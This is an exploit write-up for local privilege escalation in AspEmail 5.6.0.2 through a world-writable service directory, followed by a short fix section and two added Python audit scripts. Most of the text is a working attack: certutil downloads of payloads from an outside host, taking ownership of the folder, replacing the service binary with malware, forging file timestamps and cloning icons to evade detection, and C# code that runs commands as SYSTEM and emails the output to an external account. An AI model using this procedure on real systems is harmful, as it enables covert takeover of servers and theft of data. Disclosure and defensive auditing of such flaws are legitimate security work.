Authored by Zer0FauLT

AspEmail version 5.6.0.2 suffers from a weak permission vulnerability that allows local privilege escalation.

####################################################################################################################
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #
# Date: 13/04/2023 #
# Exploit Author: Zer0FauLT [[email protected]] #
# Vendor Homepage: https://www.aspemail.com #
# Software Link: https://www.aspemail.com/download.html #
# Product: AspEmail #
# Version: AspEmail 5.6.0.2 and all #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #
# Tested on: Windows Server 2016 and Windows Server 2019 #
# CVE : 0DAY #
####################################################################################################################

# ==================================================================================================================

[+] C:\PenTest>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

# ==================================================================================================================

* First, we test whether the AspEmail service is active.
* To do so, with normal user rights we list the processes running on the system and check whether the process of the relevant service is among them:

[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe 4400 Persits Software EmailAgent

or

[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe 4400 Persits Software EmailAgent

* We have detected that the process of the "Persits Software EmailAgent" service is in state "RUNNING".
* So we now know that the AspEmail service is active.

# ==================================================================================================================

* We will need these:

[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"

# ==================================================================================================================

[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Name : Persits Software EmailAgent
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status : Unknown
UserCanStart : False
UserCanStop : False

[+] C:\PenTest>del PrivescCheck.ps1

* Our checks flagged a "Binary Permission Vulnerability" in the "Persits Software EmailAgent" service.

# ================================================================================================================== #

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"

Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.

* We have no permission to access the AspEmail directory itself.

# ==================================================================================================================

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"

C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
DeepSecLab\psacln:(I)(OI)(CI)(N)
DeepSecLab\psaadm:(I)(OI)(CI)(N)
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)

* Unlike the other directories, we have full control over the service's "BIN" directory: the explicit Everyone:(OI)(CI)(F) entry is not inherited and applies to every file and subfolder.
* In Linux terms this is chmod 0777 (rwxrwxrwx).
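As an added example (not part of the advisory), the following Python script parses an icacls listing like the one above and flags entries that give low-privileged principals write access to a service's binary directory; the principal list and right codes it checks are an assumed audit baseline, and the sample listing is the BIN output above with backslashes restored.

```python
"""Flag low-privileged write access in an `icacls <dir>` listing of a service
binary directory. Added example, not part of the advisory."""
import re

# Principals every local user can act as (hypothetical audit list; extend as needed).
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# Simple rights granting write (F=full, M=modify, W=write, D=delete) and the
# specific rights that do the same (WD/AD add files or subdirs, DC delete child,
# WDAC/WO change the DACL or owner, DE delete).
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DC", "WDAC", "WO", "DE"}
FLAGS = {"I", "OI", "CI", "IO", "NP"}          # inheritance flags, not rights
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<perms>(?:\([^)]*\))+)$")

def parse_icacls(text, path):
    """Return [(principal, flags, rights)] from icacls output for `path`."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(path):            # first ACE shares the path's line
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue                         # blank or summary lines
        groups = re.findall(r"\(([^)]*)\)", m.group("perms"))
        flags = {g for g in groups if g in FLAGS}
        rights = {r for g in groups if g not in FLAGS for r in g.split(",")}
        aces.append((m.group("who"), flags, rights))
    return aces

def weak_aces(aces):
    """ACEs that let a low-privileged principal write into the directory."""
    return [{"principal": who, "rights": sorted(rights & WRITE_RIGHTS),
             "explicit": "I" not in flags, "applies_to_files": "OI" in flags}
            for who, flags, rights in aces
            if who.lower() in LOW_PRIV and rights & WRITE_RIGHTS]

# Constructed sample: the advisory's BIN listing with backslashes restored.
BIN = r"C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SAMPLE = BIN + r""" Everyone:(OI)(CI)(F)
      DeepSecLab\psacln:(I)(OI)(CI)(N)
      BUILTIN\Administrators:(I)(F)
      CREATOR OWNER:(I)(OI)(CI)(IO)(F)
      NT SERVICE\TrustedInstaller:(I)(CI)(F)
      NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
      BUILTIN\Users:(I)(OI)(CI)(RX)
      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for finding in weak_aces(parse_icacls(SAMPLE, BIN)):
        print(finding)   # Everyone holds an explicit (F) grant on the BIN directory
```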

# ==================================================================================================================

[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

__PATH

\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"

\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators

* We can see that "EmailAgent.exe" was installed by the Administrator and is owned by the BUILTIN\Administrators group.

# ==================================================================================================================

* Now we take ownership of this directory, since we will carry out our operations in the "BIN" directory.

[+] C:\PenTest>whoami
DeepSecLab\Hacker

[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F

processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files

* Ok. All commands succeeded. We now have full control over this directory.

# ==================================================================================================================

* Now we replace the EmailAgent file and inject a self-written malware.
* We are careful not to damage any files while doing this, so that every step can easily be undone.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe

# ==================================================================================================================

[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291

Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== renamed from EmailAgentPrivESC.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free

# ==================================================================================================================

* Next we adjust the Last Modified, Creation and Last Accessed dates of the new file.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe

* Next, we extract the icon from the real EmailAgent.exe and apply it to the exploit binary. This makes it harder to detect.
* I used the Resource Tuner Console tool:
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* It can also be done easily with the Resource Tuner tool:
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm

# ==================================================================================================================

[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291

Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
24.09.2003 09:21 12.288 EmailAgent.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free

[24.09.2003 09:21] 12.288 EmailAgent.exe
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe

* Time manipulation is done. Both files now look as if they were placed there at the same time, long ago.

# ==================================================================================================================

* Now we check the ownership of our malware.

[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

__PATH

\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"

\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28

[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name

Name

DeepSecLab\Hacker

EmailAgent.exe Owner: DeepSecLab\Hacker

# ==================================================================================================================
####################################################################################################################
# [EmailAgent.cs] #
####################################################################################################################

* We program this malware so that when the server is rebooted (i.e. when the services are restarted),
* it is triggered and executes the commands we want,
* and then sends the output of all this to the email address we specified.

using System;
using System.Linq;
using System.Text;
using System.Diagnostics;
using System.IO;
using System.Collections;

namespace CliToolSpace
{
    class _Main
    {
        static void Main(string[] args)
        {
            // Cli is the author's command-runner helper; its source is not included in the advisory.
            Cli commandLine = new Cli();
            // Run the mailer and the cleanup batch file dropped earlier into C:\Windows\Temp.
            commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");
            commandLine.Execute();
            commandLine.ToFile(@"C:\Windows\Temp");
        }
    }
}

####################################################################################################################
# [Mail.cs] #
####################################################################################################################

using System;
using System.Net.Mail;
using System.Net;

// Mail the collected output (Export.txt) as an attachment over SMTP with TLS.
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");
var mail = new MailMessage();
mail.From = new MailAddress("[email protected]");
mail.To.Add("[email protected]");
mail.Subject = "Trigger Successful!";
mail.IsBodyHtml = true;
string htmlBody;
htmlBody = "<strong>This server has been rebooted.</strong>";
mail.Body = htmlBody;
Attachment attachment;
attachment = new Attachment(@"C:\Windows\Temp\Export.txt");
mail.Attachments.Add(attachment);
SmtpServer.Port = 587;
SmtpServer.UseDefaultCredentials = false;
SmtpServer.Credentials = new System.Net.NetworkCredential("[email protected]", "p@ssw0rd123");
SmtpServer.EnableSsl = true;
SmtpServer.Timeout = int.MaxValue;
SmtpServer.Send(mail);

####################################################################################################################
# [Run.bat] #
####################################################################################################################

whoami > C:\Windows\Temp\Export.txt
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe
cd c:\Windows\Tasks
del Run.bat & del Mail.exe

####################################################################################################################

[+]Trigger Successful![+]

[+] C:\PenTest>systeminfo | findstr "Boot Time"
System Boot Time: 13.04.2022, 07:46:06

####################################################################################################################
# [Export.txt] #
####################################################################################################################

NT AUTHORITY\SYSTEM

####################################################################################################################

# ==================================================================================================================
# ...|||[FIX]|||... #
# ==================================================================================================================
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #
# ==================================================================================================================

[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Persits Software EmailAgent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Persits Software EmailAgent
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem

# ==================================================================================================================

[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
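As an added example (not part of the advisory), this Python script decodes the DACL from an `sc sdshow` string like the one above and reports which low-privileged well-known trustees hold control or start/stop rights; the alias and right tables follow the standard SDDL codes, and the sample is the SDDL above copied in. It confirms that only SYSTEM and Administrators can reconfigure the service object, so the exposed surface is the writable BIN directory rather than the service ACL.

```python
"""Decode the DACL from `sc sdshow` output and report control rights held by
low-privileged trustees. Added example, not part of the advisory."""
import re

# Service-specific and standard rights as encoded in SDDL (hex masks are not decoded).
RIGHTS = {"CC": "QUERY_CONFIG", "DC": "CHANGE_CONFIG", "LC": "QUERY_STATUS",
          "SW": "ENUMERATE_DEPENDENTS", "RP": "START", "WP": "STOP",
          "DT": "PAUSE_CONTINUE", "LO": "INTERROGATE", "CR": "USER_DEFINED_CONTROL",
          "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER"}
CONTROL = {"DC", "SD", "WD", "WO"}        # rights that let a trustee take over the service
# Well-known SID aliases any local or domain user can match; other SIDs are not evaluated.
LOW_PRIV = {"WD": "Everyone", "BU": "Users", "AU": "Authenticated Users",
            "IU": "Interactive", "SU": "Service logon", "AN": "Anonymous", "BG": "Guests"}
ACE_RE = re.compile(r"\(([^)]*)\)")

def parse_dacl(sddl):
    """Return [(ace_type, rights_set, trustee)] for the DACL part of an SDDL string."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]       # drop the SACL, if present
    aces = []
    for body in ACE_RE.findall(dacl):
        ace_type, _flags, rights, _obj, _inh, sid = body.split(";")[:6]
        codes = set() if rights.startswith("0x") else set(re.findall(r"[A-Z]{2}", rights))
        aces.append((ace_type, codes, sid))
    return aces

def risky_grants(sddl):
    """Low-privileged trustees with control rights, and those that can only start/stop."""
    control, start_stop = [], []
    for ace_type, rights, sid in parse_dacl(sddl):
        if ace_type != "A" or sid not in LOW_PRIV:        # allow-ACEs for known aliases only
            continue
        if rights & CONTROL:
            control.append((LOW_PRIV[sid], sorted(RIGHTS[r] for r in rights & CONTROL)))
        elif rights & {"RP", "WP"}:
            start_stop.append(LOW_PRIV[sid])
    return control, start_stop

# Constructed sample: the advisory's `sc sdshow` output for the EmailAgent service.
SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
        "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
        "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

if __name__ == "__main__":
    # Only SYSTEM and Administrators can reconfigure this service, so the exposed
    # surface is the writable BIN directory, not the service object itself.
    print(risky_grants(SDDL))   # ([], [])
```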

# ==================================================================================================================

[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Persits Software EmailAgent
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS

# ==================================================================================================================

[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"

Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.

DONE!

# ==================================================================================================================

[+] C:\Administrator>sc stop "Persits Software EmailAgent"

[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"

* These commands are optional. They stop and start the "Persits Software EmailAgent" service; we have fixed the vulnerability and I don't think this is necessary anymore.

# ==================================================================================================================